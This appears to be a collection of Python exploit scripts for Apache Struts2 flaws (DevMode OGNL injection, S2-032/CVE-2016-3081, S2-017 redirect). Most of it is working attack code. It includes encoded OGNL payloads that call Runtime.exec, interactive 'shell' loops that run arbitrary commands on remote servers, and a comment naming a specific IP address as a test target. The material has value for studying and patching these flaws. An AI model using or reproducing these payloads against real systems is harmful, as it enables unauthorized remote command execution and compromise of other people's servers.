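    """Fire *command* through the devMode RCE payload and print the raw response body.

    Returns True when the HTTP exchange completed (whatever the target did with
    the command) and False on a transport error.  The OGNL calls
    Runtime.exec(String): the command is split on whitespace with NO shell, so
    pipes, redirects and quoting are not interpreted, and only stdout is read
    back.  The request is a GET, so the full command lands in the target's
    access log.
    """
    target = exp_url + cmd_exp.replace("ShowMeCommand", _url_quote(command, safe=""))
    try:
        print("=" * 80)
        print("[Result]")
        print("_" * 80)
        r = requests.get(target, headers=headers, timeout=5)
        print(r.text.encode("utf-8"))
        print("=" * 80)
        return True
    except requests.RequestException as exc:
        print("[Error] %s" % exc)
        return False


def cmdTool(exp_url):
    """Interactive loop: read commands from stdin and run each one; 'q' or EOF exits."""
    while True:
        try:
            comm = raw_input("~$ ")
        except EOFError:
            exit(0)
        if comm == "q":
            exit(0)
        if not _run_command(exp_url, comm):
            print("error,try again..")


def ExecOneCmd(exp_url, command):
    """Run a single *command* (non-interactive use); True on success, False on transport error."""
    return _run_command(exp_url, command)


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-u', help='the target url.', required=True)
    parser.add_argument('-check', help='yes|no', required=False)
    parser.add_argument('-shell', help='get os shell (yes|no)', required=False)
    parser.add_argument('-command', help='one os command', required=False)
    args = parser.parse_args()
    url = args.u
    if args.check == "yes":
        if verity(url):
            print("{url} is vulnerable S2_DevMode_RCE.".format(url=url))
        else:
            print("{url} is no vulnerable..".format(url=url))
        exit(0)
    if args.shell == "yes":
        cmdTool(url)
        exit(0)
    if args.command is not None:
        ExecOneCmd(url, args.command)
        exit(0)
    # print_usage() writes to stdout itself; wrapping it in print used to append "None".
    parser.print_usage()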
```
# S2DevMode_POC.py
```
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# S2-DevMode POC
# Author: CF_HB
# 来源:http://zone.wooyun.org/content/28416
# 时间:2016年7月14日
import requests
import argparse

# Usage text; verity() prints it before each check.
banner = u'''\
# S2-DevMode POC
# Author:CF_HB
# 时间:2016年7月14日
#使用说明:
# 1、检测
python S2-DevMode_POC.py -u http://xxx.xxx.xxx.xxx/xxxxx.action
'''
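def verity(url):
    """Send the devMode canary PoC to *url*, print the verdict and return it.

    The `debug=browser` request makes the devMode debugging interceptor evaluate
    `object` as OGNL, which println()s the 32-char canary from `content` into
    the response; a vulnerable host answers with roughly 34 bytes.  The
    body-length bound rejects a page that merely contains the hex string.  The
    probe is non-destructive.

    Returns True when the canary came back, False otherwise; transport errors
    are reported on stdout and count as False.
    """
    S2_DevMode_POC = "?debug=browser&object=(%23mem=%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f%23context[%23parameters.rpsobj[0]].getWriter().println(%23parameters.content[0]):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=25F9E794323B453885F5181F1B624D0B"
    print(banner)
    print("[checking] " + url)
    try:
        res = requests.post(url + S2_DevMode_POC, timeout=4)
    except requests.RequestException as exc:
        print("Failed to connection target, try again..")
        print("[Error] %s" % exc)
        return False
    vulnerable = (res.status_code == 200
                  and "25F9E794323B453885F5181F1B624D0B" in res.content
                  and len(res.content) < 40)  # canary + newline is ~34 bytes
    if vulnerable:
        print("{url} is vulnerable S2_DevMode_RCE.".format(url=url))
    else:
        print("{url} is no vulnerable..".format(url=url))
    return vulnerable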
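parser = argparse.ArgumentParser()
parser.add_argument('-u', help='the target url.')
args = parser.parse_args()
if args.u is None:
    # Running without -u used to exit silently; show the usage line instead.
    parser.print_usage()
    exit(-1)
verity(args.u)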
```
# S2032V1.0.py
```
#!-*- coding:utf-8 -*-
import sys
import requests
import re
# Author: CF_HB
# CreatedTime: 2016-04-28
# 测试地址: http://122.224.255.238/admin/adminlogin.action
# 接收命令执行结果40K的数据,可以自己替换: 40960
#########################################################################################
# 自定义设置区域#
# --- user-adjustable settings -------------------------------------------------
# Request headers sent with every probe.  The JSESSIONID is a fixed dummy value
# and 'Safety-Testing' is an explicit tester fingerprint - both are easy to
# spot in the target's logs.
headers = {
    'user-agent': 'Mozilla/2.0 (Windows NT 3.1; rv:42.0) Gecko/200101 Firefox/12.0',
    'Cookie': 'JSESSIONID=75C9ED1CD9345SAWA328D2SA6812',
    'SOAPAction': '""',
    'Safety-Testing': 'By CF_HB',
}
# Intercepting-proxy mapping.  Defined for convenience only: no requests.get()
# call in this file passes proxies=proxy.
proxy = {'http': 'http://127.0.0.1:8080'}
# Per-request timeout in seconds.
timeout = 5
# Marker every PoC makes the target echo back; seeing it in the body means "vulnerable".
hashKey = "This_site_has_s2-032_vulnerabilities"
# Usage text shown when the command line does not match the expected shape.
notice = u''' S2-032辅助工具V1.0
# Author: CF_HB
# CreatedTime: 2016-04-28
# 漏洞编号:(CVE-2016-3081)
#V1.0功能说明:
# 1) 漏洞检查
# 2) 漏洞命令执行
# 3) POC和EXP可以自定义添加
# 4) 暂只支持GET方式提交payload
#To Do:
# 1) 支持POST类型提交
# 2) 支持IP+PORT(http://114.114.114.114:8080/)类型的自动化检测
# 3) 随时补充POC和EXP
#用法说明如下:
# 1) 检查目标是否存在S2-032漏洞用法
# usage: python S2032.py http://www.test.com/login.action check
# 2) 一句话命令执行
# usage: python S2032.py http://www.test.com/login.action "net user"
# 3) 交互式命令执行(反弹shell下,或者终端下面使用.)
# usage: python S2032.py http://www.test.com/login.action cmdtool
#####声明:
# 本脚本仅用于安全测试,请勿用于违法犯罪!
'''
###########################################################################################
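# PoC collection.  Each entry is a query string appended to the target URL and
# must make the target echo hashKey ("This_site_has_s2-032_vulnerabilities").
S2032POC = [
    # Echoes the `test` parameter through the response writer - no process is started.
    "?test=This_site_has_s2-032_vulnerabilities&method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23str%3d%23parameters.test,%23res%3d@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23res.print(%23str[0]),%23res.flush(),%23res.close",
    # Echoes hashKey via Runtime.exec("echo ...") - this one DOES spawn a process on the target.
    "?method:%23_memberAccess%3d%40ognl%2eOgnlContext%40DEFAULT_MEMBER_ACCESS%2c%23a%3d%40java%2elang%2eRuntime%40getRuntime%28%29%2eexec%28%23parameters.command[0]%29%2egetInputStream%28%29%2c%23b%3dnew%20java%2eio%2eInputStreamReader%28%23a%29%2c%23c%3dnew%20java%2eio%2eBufferedReader%28%23b%29%2c%23d%3dnew%20char%5b40960%5d%2c%23c%2eread%28%23d%29%2c%23kxlzx%3d%40org%2eapache%2estruts2%2eServletActionContext%40getResponse%28%29%2egetWriter%28%29%2c%23kxlzx%2eprintln%28%23d%29%2c%23kxlzx%2eclose&command=echo This_site_has_s2-032_vulnerabilities",
]

# EXP collection.  To add one, put GiveMeCommand where the command goes and
# append it here; ExcuteOsCommand tries them in order.
S2032EXP = [
    # nsf_exp: BufferedReader into a 40960-char buffer (longer output is cut off).
    "?method:%23_memberAccess%3d%40ognl%2eOgnlContext%40DEFAULT_MEMBER_ACCESS%2c%23a%3d%40java%2elang%2eRuntime%40getRuntime%28%29%2eexec%28%23parameters.command[0]%29%2egetInputStream%28%29%2c%23b%3dnew%20java%2eio%2eInputStreamReader%28%23a%29%2c%23c%3dnew%20java%2eio%2eBufferedReader%28%23b%29%2c%23d%3dnew%20char%5b40960%5d%2c%23c%2eread%28%23d%29%2c%23kxlzx%3d%40org%2eapache%2estruts2%2eServletActionContext%40getResponse%28%29%2egetWriter%28%29%2c%23kxlzx%2eprintln%28%23d%29%2c%23kxlzx%2eclose&command=GiveMeCommand",
    # shack2_exp: java.util.Scanner with a custom delimiter, response encoding set explicitly.
    "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=GiveMeCommand&pp=\\\\A&ppp=%20&encoding=UTF-8",
    # shack2 variant that flips the SecurityMemberAccess flags by name
    # (allowStaticMethodAccess / allowPrivateAccess / excludedPackageNamePatterns / excludedClasses).
    # Fixed: a trailing space after "encoding=UTF-8" used to be sent as part of the encoding name.
    "?method:%23_memberAccess[%23parameters.name1[0]]%3dtrue,%23_memberAccess[%23parameters.name[0]]%3dtrue,%23_memberAccess[%23parameters.name2[0]]%3d{},%23_memberAccess[%23parameters.name3[0]]%3d{},%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew%20java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&name=allowStaticMethodAccess&name1=allowPrivateAccess&name2=excludedPackageNamePatterns&name3=excludedClasses&cmd=GiveMeCommand&pp=\\\\AAAA&ppp=%20&encoding=UTF-8",
]

# Regexes that mark a response as an error page rather than command output.
# NOTE: r'[^>]+>' matches ANY '>' in the body, so genuine command output that
# contains a '>' is reported as a failed EXP and the next EXP is fired.
Error_Message = [r'[^>]+>', r'Error report', r'Apache Tomcat', r'memberAccess', r'ServletActionContext']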
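def VerityS2032(url, S2032POC):
    """Send each PoC in *S2032POC* to *url*; return True as soon as one echoes hashKey back.

    Both shipped PoCs only echo hashKey, but the second does so through
    Runtime.exec("echo ...") and therefore starts a process on the target.
    Returns False when no PoC matched or the target could not be reached.
    """
    try:
        # Integer division: under Python 3 '/' yields a float and '-' * k would raise.
        k = (len(url) + 10) // 2 + 10
        print(u"You have " + str(len(S2032POC)) + " POCS")
        for poc_count, poc in enumerate(S2032POC, 1):
            print('-' * k + "trying poc " + str(poc_count) + '-' * (k - 2))
            req = requests.get(url + poc, headers=headers, timeout=timeout)
            resulttext = req.text.encode("utf-8").strip().strip('\x00')
            if hashKey in resulttext:
                print('-' * k + "Successful" + "-" * k)
                print('--' + url + " is vulnerable [S2-032(CVE-2016-3081)]")
                print('-' * (len(url) + 40))
                return True
        print("This Target is not vulnerable")
        return False
    except requests.RequestException as exc:
        print("something error!!")
        print("[Error] %s" % exc)
        return False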
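def ExcuteOsCommand(url, yourcommand, S2032EXP):
    """Try each EXP in *S2032EXP* with *yourcommand*; print the first result that looks like command output.

    The command is percent-encoded before it replaces the GiveMeCommand
    placeholder, so '&', '#', '%', '+' and spaces reach the target intact
    instead of being parsed as part of the query string.

    CAUTION: "success" is decided by the Error_Message heuristics on the
    response body.  A response whose real output happens to contain '>' or one
    of those words is treated as a failure and the NEXT EXP is fired, so a
    command with side effects may run more than once.  Output is limited by the
    buffers in the payloads (e.g. new char[40960]).  Returns None.
    """
    try:
        from urllib import quote as _quote          # Python 2
    except ImportError:
        from urllib.parse import quote as _quote    # Python 3
    try:
        exp_k = (len(url) + 10) // 2 + 10
        print(u"You have " + str(len(S2032EXP)) + " EXPS")
        encoded = _quote(str(yourcommand), safe="")
        for exp_count, exp in enumerate(S2032EXP, 1):
            print('-' * exp_k + "trying exp " + str(exp_count) + '-' * (exp_k + 7))
            req = requests.get(url + exp.replace("GiveMeCommand", encoded), headers=headers, timeout=timeout)
            comdresulttext = req.text.encode("utf-8").strip().strip('\x00')
            if any(re.search(p, comdresulttext) for p in Error_Message):
                continue
            print('-' * exp_k + "Executed successfully" + '-' * (exp_k - 2))
            print('-' * 14)
            print('Command# ' + yourcommand)
            print('-' * 14)
            print("Result:")
            print('-' * exp_k)
            print(comdresulttext)
            print('-' * exp_k)
            return
        print("All EXP failed...")
    except requests.RequestException as exc:
        print("something error!!")
        print("[Error] %s" % exc)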
def CommandTool(url):
    """Interactive loop: verify the target first, then read commands until 'q'."""
    if not VerityS2032(url, S2032POC):
        print("the website is not vulnerable")
        return
    print("[+] Connecting to target ...")
    while True:
        comm = raw_input("~$ ")
        if comm == 'q':
            print("exit....")
            exit(0)
        if comm:
            ExcuteOsCommand(url, comm, S2032EXP)
if __name__ == "__main__":
    # Expected shape: <script> <http(s) url> <check|cmdtool|command>; anything else prints the notice.
    if len(sys.argv) != 3 or "http" not in sys.argv[1]:
        print('-' * 90)
        print('#' + notice + "#")
        print('-' * 90)
    else:
        target_url, order = sys.argv[1], sys.argv[2]
        if order == "check":
            VerityS2032(target_url, S2032POC)
            exit(0)
        if order == "cmdtool":
            CommandTool(target_url)
        else:
            ExcuteOsCommand(target_url, order, S2032EXP)
            exit(0)
```
# Struts2-017.py
```python
#coding=utf-8
import sys
import requests
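def scan(target):
    """Probe *target* for S2-017 (open redirect through the ``redirect:`` action prefix).

    The original followed the redirect and compared the final URL, which made
    the verdict depend on the third-party host vul.jdsec.com being reachable
    and made the scanner itself connect to it.  Redirects are now left
    unfollowed and the Location header is inspected instead, so no request ever
    leaves for the redirect target.  A request timeout is set; transport errors
    print 'connection error'.
    """
    info = {
        'name': u'Struts2-017 POC',
        'date': '2014-12-5',
        'author': 'Lenka',
        'poc': '?redirect:http://vul.jdsec.com/'
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
    }
    try:
        audit_request = requests.get(target + info['poc'], headers=headers,
                                     timeout=10, allow_redirects=False)
    except requests.RequestException:
        print('connection error')
        return
    audit_request.close()
    location = audit_request.headers.get('Location', '')
    if audit_request.status_code in (301, 302, 303, 307, 308):
        if location.startswith(u'http://vul.jdsec.com/'):
            print(u'[!]audit success')
            print('[*]' + target + info['poc'])
        else:
            print(u'[!]audit error')
    elif audit_request.status_code == 200:
        print(u'[!]audit error')
    else:
        print('connection error')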
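if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python struts2_poc_017.py [target]\n")
        # Fixed the doubled "python python" in the example line.
        print("Example: python struts2_poc_017.py http://www.xxx.com/xxx.action\n")
        sys.exit(1)
    scan(sys.argv[1])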
```